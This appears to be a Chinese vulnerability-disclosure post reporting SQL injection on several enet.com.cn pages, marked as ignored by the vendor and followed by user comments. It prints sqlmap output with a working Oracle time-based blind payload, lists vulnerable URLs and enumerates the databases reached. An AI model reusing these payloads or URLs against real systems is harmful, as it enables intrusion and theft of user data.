硅谷动力主+分站SQL注入致使数据泄漏

http://www.enet.com.cn/elady/star/inforcenter/star.jsp

starmonth=01&stardate=01&acid=4414 存在POST sql注入漏洞

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: POST

Parameter: starmonth

Type: AND/OR time-based blind

Title: Oracle AND time-based blind (comment)

Payload: starmonth=01' AND 7329=DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(88)||CHR(81)||CHR(90),5)--&stardate=01&acid=4414

---

web application technology: Apache, JSP

back-end DBMS: Oracle

available databases [20]:

[*] "]HOW"

[*] ADV

[*] ARTICLE_COMMENT

[*] B2B_ADMIN

[*] DBSNMP

[*] EKA

[*] FASHION

[*] FILTER_ADMIN

[*] IDC

[*] IFLOW_ADMIN

[*] IFLOW_ENEWS

[*] OUTLN

[*] PASS

[*] PDB_ADMIN

[*] ROBOT

[*] SYS

[*] SYSTEM

[*] TSMSYS

[*] WPSYS

[*] XPDB_ADMIN

其中在PASS中包含了主站的用户信息，我就不贴出来了

http://www.enet.com.cn/ediy/inforcenter/articlelist.jsp?ccid=3594&pcid=42973&pcid=9&pcid=12&pcid=15&pcid=18

http://research.enet.com.cn/questionnaire/publish/statisticalPaper.jsp?paperID=00090017f85e515f

available databases [1]:

[*] research

http://other.enet.com.cn/bg_editer/server/list.jsp?id=8

available databases [1]:

[*] test

http://www.enet.com.cn/elady/star/inforcenter/star.jsp

starmonth=01&stardate=01&acid=4414 存在POST sql注入漏洞

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: POST

Parameter: starmonth

Type: AND/OR time-based blind

Title: Oracle AND time-based blind (comment)

Payload: starmonth=01' AND 7329=DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(88)||CHR(81)||CHR(90),5)--&stardate=01&acid=4414

---

web application technology: Apache, JSP

back-end DBMS: Oracle

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-11-07 10:00

厂商回复：

最新状态：

暂无

1. 2014-11-02 10:37 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 )

   0

   坐等忽略

   1# 回复此人

2. 2014-11-07 10:32 | keeley ( 路人 | Rank:20 漏洞数:7 | 珍惜生命，远离黑阔)

   1

   楼上神预测

   2# 回复此人

3. 2014-11-07 15:35 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 )

   1

   @keeley 看看此厂商的漏洞你就懂，我也是受害者

   3# 回复此人